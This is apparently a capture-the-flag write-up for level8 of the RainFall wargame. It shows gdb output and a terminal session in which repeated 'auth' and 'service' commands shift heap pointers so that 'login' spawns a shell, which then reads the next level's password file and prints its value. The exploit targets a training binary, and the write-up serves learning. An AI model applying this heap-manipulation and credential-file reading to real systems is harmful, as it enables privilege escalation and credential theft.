
# there are 4 interesting commands: auth, service, reset, login

# we also notice the presence of the: /bin/sh:
(gdb) x/s 0x8048833
0x8048833:	 "/bin/sh"

# when we write "auth " and "service" the two addresses are automatically updated by 0x10 from the previous address
level8@RainFall:~$ ./level8
(nil), (nil)
auth
0x804a008, (nil)
auth
0x804a018, (nil)
service
0x804a018, 0x804a028
service
0x804a018, 0x804a038

# we must have auth + 0x20 non null character
level8@RainFall:~$ ./level8
(nil), (nil)
auth
0x804a008, (nil)
service
0x804a008, 0x804a018
service
0x804a008, 0x804a028 | service address = 00x804a028 = auth + 0x20
login
$ cat /home/user/level9/.pass
c542e581c5ba5162a85f767996e3247ed619ef6c6f7b76a59435545dc6259f8a
$ exit